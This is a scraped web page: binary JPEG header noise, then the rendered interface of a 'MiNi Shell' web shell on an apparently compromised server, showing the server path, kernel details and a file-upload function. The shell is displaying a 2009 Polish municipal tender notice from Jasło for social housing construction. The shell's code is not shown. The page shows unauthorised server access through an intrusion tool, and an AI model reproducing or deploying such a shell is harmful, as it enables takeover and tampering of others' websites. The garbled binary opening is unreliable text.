JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090408/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090408/59897-N-2009.html

<p class="kh_header"><b>Jasło: Budowa socjalnego  budynku wielorodzinnego  przy ulicy Sroczyńskiego  w Jaśle  wraz z infrastrukturą  zewnętrzną, zagospodarowaniem terenu</b><br>
<b>Numer ogłoszenia: 59897 - 2009; data zamieszczenia: 08.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Jasło , ul. Rynek 12, 38-200 Jasło, woj. podkarpackie, tel. 013 4486311, faks 013 4486360.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.jaslo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa socjalnego  budynku wielorodzinnego  przy ulicy Sroczyńskiego  w Jaśle  wraz z infrastrukturą  zewnętrzną, zagospodarowaniem terenu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> W imieniu i na rzecz Zamawiającego działa TBS-ABK Sp. z o.o. 38-200 Jasło, ul. Kochanowskiego 3 jako Inwestor Zastępczy. 

Budowa socjalnego  budynku wielorodzinnego  przy ulicy Sroczyńskiego  w Jaśle  wraz z infrastrukturą  zewnętrzną, zagospodarowaniem terenu.
Podstawowe dane: 
Budynek mieszkalny wielorodzinny z 16 lokali socjalnymi / galeriowiec/, dwukondygnacyjny, niepodpiwniczony,  z poddaszem nieużytkowym , technologia tradycyjna, wykończenie pod klucz.
Powierzchnia całkowita - 1028,28 m2
Powierzchnia użytkowa -   702,80 m2
Powierzchnia zabudowy -  514,14 m2
Kubatura - 3008 m3
Wymiary L= 45,04 m  S=11,03 m  H =5,85 m
Przedmiot zamówienia Zamawiający podzielił  na następujące  części :
Część 1 - Roboty konstrukcyjno - budowlane
Część 2 - Roboty sanitarne 
Część 3 - Roboty elektryczne.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.21.13.40-4, 45.30.00.00-0, 45.23.24.60-4, 45.31.00.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wymagane wadium 30 000,00 PLN, w tym: dla części Nr 1 - 23 000 PLN,  dla części Nr 2 - 5 000 PLN,  dla części Nr 3 - 2 000 PLN<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.    W przetargu mogą wziąć udział wykonawcy nie wykluczeni na podstawie art. 24 ust. 1, 2, spełniający warunki zawarte w art. 22 ust. 1 -  Prawa zamówień publicznych (Dz. U. z 2007 r. Nr 223, poz. 1655 z późn. zm.) oraz wykonawcy, którzy:
2. Wykażą,  że w ciągu ostatnich 5 lat (przed dniem wszczęcia postępowania), a jeżeli okres prowadzenia działalności jest krótszy -  w tym okresie, zrealizowali co najmniej jedno zamówienie  odpowiadające swoim rodzajem, zakresem i wartością przedmiotowemu  zamówieniu, z podaniem jego wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że robota ta została wykonana należycie - dotyczy części nr 1,2,3.
3. W ciągu ostatnich pięciu lat , a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie,  byli przynajmniej raz głównym wykonawcą w zadaniu o przeznaczeniu i złożoności porównywalnej z przedmiotem zamówienia - dotyczy części nr 1.

4. Dysponują osobą posiadającą uprawnienia budowlane w specjalności konstrukcyjno-budowlanej - kierownik budowy posiadający co najmniej 5 letnie doświadczenie w kierowaniu robotami oraz mogący się wykazać doświadczeniem w pełnieniu funkcji kierownika budowy dla co najmniej 2 podobnych inwestycji - dotyczy części nr 1.


5. Dysponują osobą posiadającą uprawnienia budowlane w branży sanitarnej w zakresie sieci i instalacji (wod-kan, gaz, c o, ccw)  z doświadczeniem zawodowym co najmniej 5 letnim - dotyczy części nr 2.

6. Dysponują osobą posiadającą uprawnienia w branży elektrycznej z co najmniej 5 letnim doświadczeniem zawodowym - dotyczy części nr 3.

7. Dysponują lub będą dysponować niezbędnymi do wykonania zamówienia narzędziami i urządzeniami tj. koparką, ładowarką /lub podobnym sprzętem/ - dotyczy części nr 1. 
8. Uzyskali przychody ze sprzedaży robót budowlano-montażowych w roku 2008 lub 2007 lub 2006 nie mniejsze niż  3 mln PLN - dotyczy części nr 1, /  nie mniejsze niż  600 tysięcy PLN - dotyczy części nr 2, / nie mniejsze niż  500 tysięcy PLN  - dotyczy części 3.
9. Ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności.

10. Ocena spełnienia w/w  warunków zostanie dokonana  zgodnie z formułą          < spełnia - nie spełnia > na podstawie złożonych wraz z ofertą  oświadczeń i dokumentów.
11.  Niespełnienie któregokolwiek warunku spowoduje wykluczenie Wykonawcy  z postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia spełnienia warunków udziału w postępowaniu wykonawca musi dołączyć do oferty następujące dokumenty i oświadczenia:
1.	Aktualny odpis z właściwego rejestru albo zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
2.	W przypadku gdy Wykonawcą jest spółka cywilna lub jawna - umowę spółki i wypis z ewidencji gospodarczej dla każdego wspólnika.
3.	Dokumenty stwierdzające, że osoby, które będą wykonywać zamówienie, posiadają wymagane uprawnienia. Aktualne zaświadczenie przynależności do Polskiej Izby Inżynierów Budownictwa.
4.	Jeżeli Wykonawcy  ubiegają się wspólnie o udzielenie zamówienia - pełnomocnictwo do reprezentowania  w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Wymagania dotyczące składania dokumentów i oświadczeń dotyczą każdego z Wykonawców z osobna.
5.	Oświadczenie wykonawcy o spełnieniu warunków określonych w  art. 22 ust.1 ustawy pzp - zał. Nr 3 do SIWZ,
6.	Kopię dowodu wpłaty wadium,
7.	Wypełniony  kosztorys ofertowy przygotowany na podstawie przedmiarów robót, 
8.	Wykaz osób i podmiotów, które będą  wykonywać lub będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji niezbędnymi do wykonania zamówienia, a także zakres wykonywanych  przez nich czynności - zał. Nr 2 i zał. Nr 5  do SIWZ. 
9.	Wykaz wykonanych robót budowlanych w okresie ostatnich 5 lat (przed dniem wszczęcia postępowania o udzielenie zamówienia), a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie odpowiadających swoim rodzajem, zakresem i wartością przedmiotowemu zamówieniu z podaniem ich wartości, daty i miejsca wykonania oraz z  załączeniem dokumentów potwierdzających, że roboty  te zostały wykonane z należytą starannością (np. protokół odbioru, referencje itp.) - zał. Nr 4   do SIWZ,
10.	Wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, jakimi dysponuje wykonawca lub pisemne zobowiązanie innych podmiotów do udostępnienia tych narzędzi i  urządzeń w celu zrealizowania zamówienia,
11.	Harmonogram rzeczowo-finansowy realizacji poszczególnych elementów robót, 
12.	Polisę lub inny dokument ubezpieczeniowy potwierdzający, że Wykonawca jest ubezpieczeniowy od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej,
13.	Sprawozdanie finansowe, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią odpowiednio o badanym sprawozdaniu, a w przypadku wykonawców niezobowiązanych do sporządzania sprawozdania finansowego inne dokumenty określające obroty oraz zobowiązania i należności - za okres nie dłuższy niż ostatnie trzy lata obrotowe, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres,
14.	Parafowany przez Wykonawcę projekt umowy zał. Nr 6 do SIWZ,
15.	Wyceniona Tabela kosztowa - opracowana na podstawie wzoru, stanowiącego zał. Nr 7  do SIWZ,
16.	Pełnomocnictwo osób podpisujących ofertę do podpisywania zobowiązań w imieniu firmy, składającej ofertę.
Wskazane dokumenty mogą być doręczone w formie oryginałów lub kserokopii poświadczonych za zgodność z oryginałem przez Wykonawcę, na każdej zapisanej stronie. Zamawiający może zażądać przedstawienia oryginałów lub notarialnie potwierdzonych kopii dokumentów..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 90</li>
<li>2 - Okres udzielonej gwarancji - 10</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.tbs.jaslo.biz.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> TBS-ABK Sp. z o.o. 38-200 Jasło, ul. Kochanowskiego 3, pokój Inwestycje.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.04.2009 godzina 10:00, miejsce: TBS-ABK Sp. z o.o. 38-200 Jasło, ul. Kochanowskiego 3 /sekretariat/.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Roboty konstrukcyjno-budowlane.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Roboty konstrukcyjno-budowlane:
- fundamenty - ławy i ściany betonowe wylewane, 
- ściany zewnętrzne i wewnętrzne - jednorodne murowane, ceramiczne, 
- stropy i schody wylewane żelbetowe,
- dach -  więźba drewniana, kryta blachodachówką,
- przyłącz wodociągowy, kanalizacji sanitarnej i deszczowej,
 - drogi, parkingi, zagospodarowanie terenu.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.21.13.40-4, 45.11.27.10-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 10.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Okres udzielonej gwarancji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Roboty  sanitarne.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Roboty  sanitarne:
- instalacja wod-kan -rury z polietylenu sieciowanego i PCV
- instalacja gazowa - z rur stalowych spawana
- instalacja c o - piece dwufunkcyjne, rury z polietylenu sieciowanego.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.24.60-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Okres udzielonej gwarancji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Roboty elektryczne.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Roboty elektryczne:
- wewnętrzna instalacja elektryczna oświetlenia i gniazd wtyczkowych,
- instalacja elektryczna dzwonkowa,
- instalacja telefoniczna, TV kablowej i internetowa / ruraż/
-  instalacja elektryczna odgromowa.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.31.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 45.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Okres udzielonej gwarancji - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com